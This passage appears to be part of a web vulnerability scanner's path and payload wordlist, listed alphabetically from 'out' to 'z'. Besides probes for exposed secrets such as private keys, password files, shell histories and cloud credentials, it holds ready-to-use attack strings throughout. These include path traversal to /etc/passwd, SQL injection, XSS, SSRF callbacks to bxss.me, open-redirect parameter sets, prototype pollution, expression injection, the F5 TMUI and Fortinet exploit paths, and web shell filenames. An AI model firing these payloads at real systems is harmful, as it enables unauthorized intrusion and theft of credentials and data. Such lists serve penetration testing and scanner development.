out/?//bxss.me 
out?//bxss.me 
output-build.txt 
owa 
owa/auth/y.js 
p 
p1KaLmIg2kB7fZp5 
package 
package.json 
package-lock.json 
page 
?page=1 
?page=../../../../../../../../../etc/passwd%00.jpg 
_pages 
pagespeed_admin/ 
pagespeed_global_admin/ 
pantheon.upstream.yml 
?param=-1+UNION+SELECT+GROUP_CONCAT(table_name)+FROM+information_schema.tables 
?param=cmd.exe 
parameters.yml 
parameters.yml.dist 
pass 
.passwd 
passwd 
password 
Password 
password.mdb 
passwords 
passwords.mdb 
password.sqlite 
passwords.sqlite 
passwords.txt 
password.txt 
pbmefezixi?cb277485=1 
pentaho/api/userrolelist/systemRoles?require-cfg.js 
perl/printenv.pl 
perl-status 
personal 
personal.mdb 
personal.sqlite 
pgadmin 
pgmyadmin 
photo 
photopost 
php 
PHP 
phpAddressBook 
phpads 
php-backdoor.php 
phpbb 
phpBB 
phpBB2 
phpCollab 
.php_cs.cache 
phpfpm_status?json&full 
phpfreechat 
phpFreeChat 
phpfusion 
phpgedview 
phpinfo.php 
phpinfo.php5 
php.ini 
PHPizabi 
phpldapadmin 
phplinks 
phplist 
phpliteadmin.php 
phpmyadmin 
phpMyAdmin 
phpMyAdmin/ 
phpmyadmin0 
phpMyAdmin0 
phpmyadmin1 
phpMyAdmin1 
phpmyadmin2/ 
phpMyAdmin2/ 
phpmyadmin2/main.php 
phpMyAdmin2/main.php 
phpmyadmin/main.php 
phpMyAdmin/main.php 
phpmyadmin/setup/index.php 
phpMyAdmin/setup/index.php 
phpmyfaq 
phpnuke 
php-ofc-library 
phponline 
php-opcache-status/ 
phppgadmin 
phpPgAdmin 
php.php 
phpshop 
phpsysinfo 
phpThumb 
phpThumb.php 
phpunit.xml 
pics 
pictures 
ping?json&full 
pi.php 
pi.php5 
piwigo 
piwik 
piwik/index.php 
piwik/index.php?module=CoreHome&action=index&idSite=2&period=day&date=today 
player 
pligg 
plugin/index.html 
plugins 
plugins/servlet/oauth/users/icon-uri?consumerUri=http://bxss.me/t/fit.txt 
plupload 
pma 
pma/ 
PMA/ 
pma/main.php 
PMA/main.php 
pma/setup/index.php 
pmwiki 
poll 
pom.xml 
portal 
postnuke 
pp404?id.__proto__.expect=100-continue&id.constructor.prototype.expect=100-continue&id[__proto__][expect]=100-continue&__proto__.expect=100-continue&constructor.prototype.expect=100-continue& 
?pp=env 
prestashop 
_private 
private 
private.key 
privatekey.key 
private.mdb 
private.sqlite 
proberv.php 
Procfile 
profile 
Profile 
_profiler/open 
.project 
projects 
project.xml 
propel.ini 
prv 
.psql_history 
publication_list.xml 
public/elfinder/php/connector.minimal.php?cmd=open&init=1&tree=1 
public/elFinder/php/connector.minimal.php?cmd=open&init=1&tree=1 
pubspec.yaml 
punbb 
p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=dir 
.pydevproject 
pyproject.toml 
q 
qcXNQ9ctjRwJEvKz 
qHLKjfnAJ4.jsp 
query?db=db&q=SHOW+DATABASES 
r 
r57eng.php 
r57.php 
r57shell.php 
r58.php 
railo-context/admin/update.cfm?ADMINTYPE=admin<svg/onload=alert(1)> 
Rakefile 
read.me 
readme 
README 
README.htm 
readme.html 
readme.md 
README.md 
readme.txt 
Readme.txt 
Read Me.txt 
Read_Me.txt 
README.txt 
README.TXT 
recaptcha 
recentservers.xml 
recover 
recover.asp 
recover.aspx 
recover.jsp 
recover.php 
redirect 
redirect.asp 
redirect.aspx 
redirect/bxss.me 
redirect.jsp 
redirect.php 
?redirectto=http://192.168.206.138&redirect_to=http://192.168.206.138&succUrl=http://192.168.206.138&file=http://192.168.206.138&link=http://192.168.206.138&referrer=http://192.168.206.138&u=http://192.168.206.138&hostname=http://192.168.206.138&returnTo=http://192.168.206.138&return_path=http://192.168.206.138 
?redir=http://192.168.206.138&wp_http_referer=http://192.168.206.138&endpoint=http://192.168.206.138&fallback=http://192.168.206.138&ref_url=http://192.168.206.138&state=http://192.168.206.138&l=http://192.168.206.138&return_to=http://192.168.206.138&redirect_url=http://192.168.206.138&return_url=http://192.168.206.138 
redmine 
register 
Register 
register.asp 
register.aspx 
register.cgi 
register.html 
register.jsp 
register.php 
register.php?do=register 
RegisterUser 
registration 
registration.asp 
registration.aspx 
registration.cgi 
registration.html 
registration.jsp 
registration.php 
release 
remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession 
render/http://bxss.me/t/fit.txt 
render?url=http://bxss.me/t/fit.txt 
report 
reports/rwservlet?report=test.rdf+desformat=html+destype=cache+JOBTYPE=rwurl+URLPARAMETER=%22http://bxss.me/rpb.png%22 
reports/rwservlet/showenv 
reports/Webalizer/ 
?requestTokenAndRedirect=http://192.168.206.138&retURL=http://192.168.206.138&rurl=http://192.168.206.138&next_url=http://192.168.206.138&callback=http://192.168.206.138&site=http://192.168.206.138&go=http://192.168.206.138 
reseller 
reset 
resizer.debug 
resizer.debug.ashx 
resources 
rest 
RestApi 
restricted 
restservice 
robots.txt 
ROC7aLtJ 
rockmongo/ 
roller-ui 
roller-ui/login.rol?pageTitle=${new%20java.lang.Integer(99855%2b100104)} 
root 
Root 
roundcube 
roundcubemail 
r.php 
rss 
rst.php 
runcms 
run.py 
s 
s/1xugdXf2gy4LHvZThieDT4/_/;/WEB-INF/decorators.xml 
.s3cfg 
sales.csv 
sales.log 
sales.sql 
sales.sql.gz 
sales.txt 
sales.xls 
sample 
samples 
save 
schema.sql 
schema.yml 
screenshot/http://bxss.me/t/fit.txt 
script 
scripts 
scripts/
scripts/manage.py 
sdk/../../../../../../../../../../../../../etc/passwd 
search 
?search=%3Cscript%3Ealert(1)%3C%2Fscript%3E 
searchblox/plugin/index.html 
?search=<script>alert(1)</script> 
secret 
Secret 
secrets 
secrets.json 
secure 
secured 
security 
security.yml 
sensorlist.htm 
serendipity 
server-info 
server.js 
server.key 
server.log 
server-status 
server-status?json&full 
server/TCPIPGEN.htm 
service 
service-account-credentials.json 
service.asmx 
services 
servlet 
servlet/%0ARefresh:0;URL=javascript:prompt(1)%0A1 
servlet/SnoopServlet 
session 
sessions 
settings 
settings.json 
settings.php 
settings.py 
setup 
setup/index.php?s=set 
setup/install.php 
setup.py 
sftp-config.json 
share 
shell 
shell.php 
.sh_history 
shuajlurkv?cb214443=1 
sidekiq 
signup 
signup/account 
signup.asp 
signup.aspx 
signup.cgi 
signup.html 
signup.jsp 
signup.php 
silverstripe 
simple-backdoor.php 
simpleviewer 
site 
site_admin 
siteadmin 
sitemap.xml 
sitemap.xml.gz 
smarty 
smf 
snapshot 
snoop.jsp 
soap 
soap.aspx 
soap.jsp 
soap.php 
software 
solr 
SOLR 
solr1 
solr2 
solr3 
solr4 
solr5 
solr/admin/ 
solr/select/?q=test 
_source 
space 
sphider 
spool 
sql 
__SQL 
_SQL 
SQL 
_sqladm 
sqladm 
sql.asp 
sql.aspx 
sqlbuddy 
sql.inc 
.sqlite_history 
sql.jsp 
sqlnet 
sqlnet.log 
sql.php 
squirrel 
squirrelmail 
_src 
src 
.ssh 
staff 
stat/ 
static 
static/ 
static?/%2557EB-INF/web.xml 
static/api/swagger.json 
static/api/swagger.yaml 
static/../../../../../../../../../../../etc/shells 
static\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5Cetc\x5Cshells 
statistics 
statistics/ 
Statistik/ 
.stats/ 
stats 
stats/ 
stats.asp 
stats.aspx 
stats.jsp 
stats.php 
status 
status?full=true 
status?json&full 
statystyka/ 
storage 
storage/logs/laravel.log 
stronghold-info 
stronghold-status 
.styleci.yml 
styles/
.subversion 
sugarcrm 
SugarCRM 
suitecrm/install.php 
suite/install.php 
support 
support/setup/index.php 
svn 
SVN 
.svn/entries 
swagger.json 
swagger-ui/swagger.json 
swagger-ui/swagger.yaml 
swagger/v1/swagger.json 
swagger/v1/swagger.yaml 
swagger/v2/swagger.json 
swagger/v2/swagger.yaml 
swagger.yaml 
symfony 
sysadmin 
sysadmins 
sysbackup 
sysstat/ 
system 
system/console 
system/console/gatewaystatus 
system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvc2hlbGxzIiwgIm91dCJdXQ%3d%3d/test.jpeg 
system.log 
system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvc2hlbGxzIiwgIm91dCJdXQ%3d%3d/test.jpeg 
t 
tag 
tags 
tar 
tar.bz2 
tar.gz 
tcpdf 
telescope/ 
temp 
TEMP 
templates 
temp.php 
terminal 
!test 
_test 
test 
test_ 
test.asp 
test.aspx 
test.chm 
test.htm 
test.html 
testing 
TestingNginxTest553074.txt 
TestingNginxTest553074.txt/testing.php 
test.jsp 
test.mdb 
test.php 
_tests 
tests 
test.sqlite 
test.txt 
testweb 
text-base 
theme/META-INF%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd 
theme/META-INF%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini 
themes 
thread 
threads 
thumb 
thumbnail 
tikiwiki 
timthumb.php 
tinymce 
tmp 
TMP 
tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin 
TODO 
tomcat 
tomcat-docs/appdev/sample/web/hello.jsp?test=<script>alert(12345)</script> 
tomcat/host-manager/html/ 
tomcat/host-manager/text/ 
tomcat/manager/html/ 
tomcat/manager/status/ 
tools 
tools.asp 
tools.aspx 
tools.jsp 
tools.php 
tOSBi6UT 
trac 
Trace.axd 
tracker 
.travis.yml 
tst 
tst216343 
tsweb 
ttp://192.168.206.138/api-docs/ 
ttp://192.168.206.138/swaggerui 
ttp://www.testing.xyzzas 
twiki 
types 
typolight 
%u002e/WEB-INF/web.xml 
ubb_threads 
ui/authentication/ 
ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file://C:\x5CWindows\x5Cwin.ini 
ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/shells 
ulefjGugu9.cfm 
ultrastats 
unauth/php/change_password.php/%22%3E%3Csohctepyxl%3E 
updates 
upgrade 
upload 
Upload 
upload.asp 
Upload.asp 
upload.aspx 
Upload.aspx 
uploader 
uploadify 
upload.jsp 
Upload.jsp 
upload.php 
Upload.php 
uploads 
uploads/elfinder/php/connector.minimal.php?cmd=open&init=1&tree=1 
uploads/elFinder/php/connector.minimal.php?cmd=open&init=1&tree=1 
upstream_conf?upstream=backend 
uri 
url 
?url=http://192.168.206.138&next=http://192.168.206.138&to=http://192.168.206.138&view=http://192.168.206.138&forward=http://192.168.206.138&dest=http://192.168.206.138&destination=http://192.168.206.138&redirect=http://192.168.206.138&uri=http://192.168.206.138&path=http://192.168.206.138 
usage/ 
usagedata/ 
user 
useradmin 
usercp 
UserFile 
userfiles 
UserFiles 
user_guide 
.user.ini 
user/register 
UserRegister 
UserRegistration 
users 
users.csv 
users.db 
users.ini 
users.log 
users.mdb 
users/sign_in 
users.sql 
users.sql.gz 
users.sqlite 
users.txt 
users.xls 
user.txt 
user_uploads 
utf8 
util/barcode.php?type=../../../../../../../../../../../etc/passwd%00 
v 
v1 
v1.0 
v1.1 
v1/agent/self 
v1/api 
V1/OData/OData.svc/ 
v1/swagger.json 
v1/swagger.yaml 
v2/api 
v2/docs 
V2/OData/OData.svc/ 
v2/swagger.json 
v2/swagger.yaml 
v3/api 
V3/OData/OData.svc/ 
v4/api 
V4/OData/OData.svc/ 
v5/api 
Vagrantfile 
Vagrantfile.backup 
validator.php 
vanilla 
varz 
vb 
vbulletin 
vendor 
vendor/
vendor/amnuts/opcache-gui/index.php 
version 
videodb 
view 
viewcvs 
.viminfo 
vlanofrjof 
vlxbisbnav?cb147948=1 
vpn/../vpns/cfg/smb.conf 
_vti_adm 
_vti_aut 
_vti_bin 
vtiger 
_vti_inf.html 
_vti_pvt 
_vti_pvt/authors.pwd 
_vti_pvt/service.cnf 
w 
warez 
web 
webaccess 
webadmin 
webadmin.php 
_webalizer/ 
webalizer/ 
Webalizer/ 
WebApplication1 
WebApplication2 
WebApplication3 
webcenter/afr/jfkak/remote/H4sIAAAAAAAACnWMsU7DMBCGr6RRU9QBGBg6IrHaqRCNgAGkShWRwgJix22c2sjExr6Cu_AYPAUvgXiCrsysvAESOFVWfulO30n3f2_fEDsLu_fsiZElSkUumRNXzMS9z_eP_bt1BFtT2FaalVM2R21z6KOw3AmtSm_OL6DJ4DkJeydMJ8gGG1nNkdxeF6%2BH2Xj482Uj6OWQiCCf6JLn0DXaYgF9tkShrcQVwl7RFKli9YLeoJX14qyAbiUVf4QXiAIL7bDlxFiNeq5Ve0eWVxv05rcNwlBIPDoZjdM0G2Up49XxjMy8c%2BSBI3Ro8x9j0CIa4xEOGjil9P8W9X%2BTKTYLMQEAAA%3D%3D/ 
web.config 
web.config.bak 
web.config.bakup 
web.config.i18n.ashx?l=en-US&v=zzztest 
web.config.old 
web.config.temp 
web.config.tmp 
web-console/ 
web-console/Invoker 
web-console/status?full=true 
web/database/manager 
webgrind 
.//WEB-INF 
WEB-INF%20-%20Copy/jboss-web.xml 
WEB-INF%20-%20Copy/web.xml 
WEB-INF%20(copy)/jboss-web.xml 
WEB-INF%20(copy)/web.xml 
WEB-INF.7z 
WEB-INF/Copy%20of%20jboss-web.xml 
WEB-INF/Copy%20of%20web.xml 
WEB-INF/jboss-web.xml 
WEB-INF/jboss-web.xml_ 
WEB-INF/jboss-web.xml~ 
WEB-INF/jboss-web.xml%20-%20Copy 
WEB-INF/jboss-web.xml%20(copy) 
WEB-INF/jboss-web.xml.bak 
WEB-INF.rar 
WEB-INF.tar 
WEB-INF/web.xml 
WEB-INF/web.xml_ 
WEB-INF/web.xml~ 
WEB-INF/web.xml%20-%20Copy 
WEB-INF/web.xml%20(copy) 
WEB-INF/web.xml.bak 
WEB-INF.zip 
webmail 
webmin 
webpack.config.js 
webpagetest/index.php 
WebService 
webstat/ 
web/static/c:/windows/win.ini 
webstats 
webstats/ 
webstats.html 
webtools/ 
.well-known/acme-challenge/<50645304> 
.well-known/apple-app-site-association 
.well-known/openid-configuration 
whmcs 
wiki/install.php 
wizards 
wordpress 
workarea 
WorkArea 
wp 
wp-admin 
wp-admin/setup-config.php 
wp-cli.yml 
wp-content 
wp-includes 
wp-login.php?action=register 
wps/wcm/connect/'+or+'SHyo0'='SHyo0 
ws 
WS_FTP 
ws_ftp.log 
WS_FTP.LOG 
wstat/ 
_www 
www 
wwwboard 
wwwstats.htm 
\x22922382%40 
\x5Cbxss.me 
\x5Cbxss.me//%2F.. 
xampp 
x-cart 
xls 
xml 
xmlrpc 
xmlrpc_server.php 
xoops 
Y94x2lpaGe.jsp 
yarn.lock 
YouPHPTube/install/index.php 
z 
zabbix/ 
zehir.php 
zencart 
zenoss 
zenpage 
zenphoto 
zeroclipboard 
../../../../../../../../z/../../../../../../../../../etc/shells 
zip 
zipfiles 
zips 
zj8ucv0se050 
zj8ucv0se050.html 
zj8ucv0se050.jsp 
zj8ucv0se050.php 
zope 
.zshrc 
zvcsqksqdx?cb682236=1 
